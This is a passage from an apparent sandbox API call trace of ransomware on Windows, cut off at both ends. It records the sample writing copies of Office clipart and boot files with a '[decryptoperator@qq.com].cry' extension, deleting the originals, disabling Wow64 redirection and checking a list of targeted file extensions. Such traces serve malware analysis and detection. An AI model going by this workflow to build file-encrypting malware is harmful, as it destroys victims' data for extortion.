lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.732] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0054.732] GetLastError () returned 0x0 [0054.732] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xfe2, lpOverlapped=0x0) returned 1 [0054.952] WriteFile (in: hFile=0x224, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xff0, lpOverlapped=0x0) returned 1 [0055.121] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.121] WriteFile (in: hFile=0x224, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.122] SetEndOfFile (hFile=0x224) returned 1 [0055.122] CloseHandle (hObject=0x224) returned 1 [0055.122] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.122] SetEndOfFile (hFile=0x190) returned 1 [0055.123] CloseHandle (hObject=0x190) returned 1 [0055.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.123] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf")) returned 1 [0055.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0055.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0055.123] lstrlenW (lpString=".doc") returned 4 [0055.123] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.123] lstrlenW (lpString=".docx") returned 5 [0055.123] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.123] lstrlenW (lpString=".pdf") returned 4 [0055.123] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.123] lstrlenW (lpString=".xls") returned 4 [0055.123] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.123] lstrlenW (lpString=".xlsx") returned 5 [0055.123] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.123] lstrlenW (lpString=".ppt") returned 4 [0055.124] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0055.124] lstrlenW (lpString=".zip") returned 4 [0055.124] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.124] lstrlenW (lpString=".rar") returned 4 [0055.124] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.124] lstrlenW (lpString=".bz2") returned 4 [0055.124] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.124] lstrlenW (lpString=".7z") returned 3 [0055.124] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0055.124] lstrlenW (lpString=".dbf") returned 4 [0055.124] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0055.124] lstrlenW (lpString=".1cd") returned 4 [0055.124] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0055.124] lstrlenW (lpString=".jpg") returned 4 [0055.124] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.124] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=40206) returned 1 [0055.124] CloseHandle (hObject=0x190) returned 1 [0055.124] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf")) returned 0x20 [0055.124] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0055.125] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.125] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0055.256] GetLastError () returned 0x0 [0055.256] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x9d0e, lpOverlapped=0x0) returned 1 [0055.464] WriteFile (in: hFile=0x22c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x9d10, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x9d10, lpOverlapped=0x0) returned 1 [0055.465] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.465] WriteFile (in: hFile=0x22c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.465] SetEndOfFile (hFile=0x22c) returned 1 [0055.465] CloseHandle (hObject=0x22c) returned 1 [0055.465] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.465] SetEndOfFile (hFile=0x190) returned 1 [0055.466] CloseHandle (hObject=0x190) returned 1 [0055.467] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.467] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf")) returned 1 [0055.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0055.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0055.467] lstrlenW (lpString=".doc") returned 4 [0055.467] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.467] lstrlenW (lpString=".docx") returned 5 [0055.467] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.467] lstrlenW (lpString=".pdf") returned 4 [0055.467] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.467] lstrlenW (lpString=".xls") returned 4 [0055.467] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.467] lstrlenW (lpString=".xlsx") returned 5 [0055.467] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.467] lstrlenW (lpString=".ppt") returned 4 [0055.467] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0055.467] lstrlenW (lpString=".zip") returned 4 [0055.467] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.467] lstrlenW (lpString=".rar") returned 4 [0055.467] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.467] lstrlenW (lpString=".bz2") returned 4 [0055.468] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.468] lstrlenW (lpString=".7z") returned 3 [0055.468] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0055.468] lstrlenW (lpString=".dbf") returned 4 [0055.468] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0055.468] lstrlenW (lpString=".1cd") returned 4 [0055.468] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0055.468] lstrlenW (lpString=".jpg") returned 4 [0055.468] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.468] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=13515) returned 1 [0055.468] CloseHandle (hObject=0x190) returned 1 [0055.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif")) returned 0x20 [0055.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0055.468] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.469] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0055.469] GetLastError () returned 0x0 [0055.469] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x34cb, lpOverlapped=0x0) returned 1 [0055.495] WriteFile (in: hFile=0x22c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x34d0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x34d0, lpOverlapped=0x0) returned 1 [0055.496] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.496] WriteFile (in: hFile=0x22c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.496] SetEndOfFile (hFile=0x22c) returned 1 [0055.763] CloseHandle (hObject=0x22c) returned 1 [0055.993] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.993] SetEndOfFile (hFile=0x190) returned 1 [0055.993] CloseHandle (hObject=0x190) returned 1 [0055.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.994] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif")) returned 1 [0056.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.054] lstrlenW (lpString=".doc") returned 4 [0056.054] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0056.054] lstrlenW (lpString=".docx") returned 5 [0056.054] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0056.054] lstrlenW (lpString=".pdf") returned 4 [0056.054] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0056.054] lstrlenW (lpString=".xls") returned 4 [0056.054] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0056.054] lstrlenW (lpString=".xlsx") returned 5 [0056.054] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0056.054] lstrlenW (lpString=".ppt") returned 4 [0056.054] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0056.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.054] lstrlenW (lpString=".zip") returned 4 [0056.054] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0056.054] lstrlenW (lpString=".rar") returned 4 [0056.054] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0056.054] lstrlenW (lpString=".bz2") returned 4 [0056.054] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0056.054] lstrlenW (lpString=".7z") returned 3 [0056.054] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0056.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.054] lstrlenW (lpString=".dbf") returned 4 [0056.054] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0056.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.054] lstrlenW (lpString=".1cd") returned 4 [0056.054] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0056.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.054] lstrlenW (lpString=".jpg") returned 4 [0056.054] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 Thread: id = 15 os_tid = 0x9fc [0035.259] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x3880480 [0035.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x3890488 [0035.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650540 [0035.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x653240 [0035.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650558 [0035.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x3b70020 [0035.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650570 [0035.260] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650570, Size=0x20) returned 0x67fd88 [0035.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650570 [0035.260] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650570, Size=0x20) returned 0x67fd60 [0035.261] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.261] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0035.261] Wow64DisableWow64FsRedirection (in: OldValue=0x301ff58 | out: OldValue=0x301ff58*=0x0) returned 1 [0035.261] lstrlenW (lpString="kernel32.dll") returned 12 [0035.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd88 | out: hHeap=0x600000) returned 1 [0035.261] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0035.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd60 | out: hHeap=0x600000) returned 1 [0035.261] Sleep (dwMilliseconds=0x64) [0035.467] lstrcmpiW (lpString1=".ttf", lpString2=".cry") returned 1 [0035.467] lstrlenW (lpString="kor_boot.ttf") returned 12 [0035.467] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0035.557] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=2371360) returned 1 [0035.557] CloseHandle (hObject=0x178) returned 1 [0035.557] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0035.557] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.557] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0035.557] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.557] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.557] lstrlenW (lpString=".doc") returned 4 [0035.557] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.557] lstrlenW (lpString=".docx") returned 5 [0035.557] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.557] lstrlenW (lpString=".pdf") returned 4 [0035.557] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.557] lstrlenW (lpString=".xls") returned 4 [0035.557] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.557] lstrlenW (lpString=".xlsx") returned 5 [0035.557] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.557] lstrlenW (lpString=".ppt") returned 4 [0035.557] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.557] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.557] lstrlenW (lpString=".zip") returned 4 [0035.557] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.557] lstrlenW (lpString=".rar") returned 4 [0035.557] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.557] lstrlenW (lpString=".bz2") returned 4 [0035.557] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.557] lstrlenW (lpString=".7z") returned 3 [0035.557] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.557] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.557] lstrlenW (lpString=".dbf") returned 4 [0035.558] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.558] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.558] lstrlenW (lpString=".1cd") returned 4 [0035.558] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.558] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.558] lstrlenW (lpString=".jpg") returned 4 [0035.558] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.558] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.558] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.558] lstrlenW (lpString=".doc") returned 4 [0035.558] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.558] lstrlenW (lpString=".docx") returned 5 [0035.558] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.558] lstrlenW (lpString=".pdf") returned 4 [0035.558] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.558] lstrlenW (lpString=".xls") returned 4 [0035.558] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.558] lstrlenW (lpString=".xlsx") returned 5 [0035.558] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.558] lstrlenW (lpString=".ppt") returned 4 [0035.558] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.558] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.558] lstrlenW (lpString=".zip") returned 4 [0035.558] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.558] lstrlenW (lpString=".rar") returned 4 [0035.558] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.558] lstrlenW (lpString=".bz2") returned 4 [0035.558] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.558] lstrlenW (lpString=".7z") returned 3 [0035.558] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.558] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.558] lstrlenW (lpString=".dbf") returned 4 [0035.558] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.558] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.558] lstrlenW (lpString=".1cd") returned 4 [0035.558] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.558] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.559] lstrlenW (lpString=".jpg") returned 4 [0035.559] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.559] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0035.559] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.559] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0035.559] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=93248) returned 1 [0035.559] CloseHandle (hObject=0x178) returned 1 [0035.559] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0035.559] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.559] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.559] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.559] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.559] lstrlenW (lpString=".doc") returned 4 [0035.559] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.559] lstrlenW (lpString=".docx") returned 5 [0035.559] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.559] lstrlenW (lpString=".pdf") returned 4 [0035.559] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.559] lstrlenW (lpString=".xls") returned 4 [0035.559] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.559] lstrlenW (lpString=".xlsx") returned 5 [0035.559] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.560] lstrlenW (lpString=".ppt") returned 4 [0035.560] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.560] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.560] lstrlenW (lpString=".zip") returned 4 [0035.560] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.560] lstrlenW (lpString=".rar") returned 4 [0035.560] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.560] lstrlenW (lpString=".bz2") returned 4 [0035.560] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.560] lstrlenW (lpString=".7z") returned 3 [0035.560] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.560] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.560] lstrlenW (lpString=".dbf") returned 4 [0035.560] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.560] lstrlenW 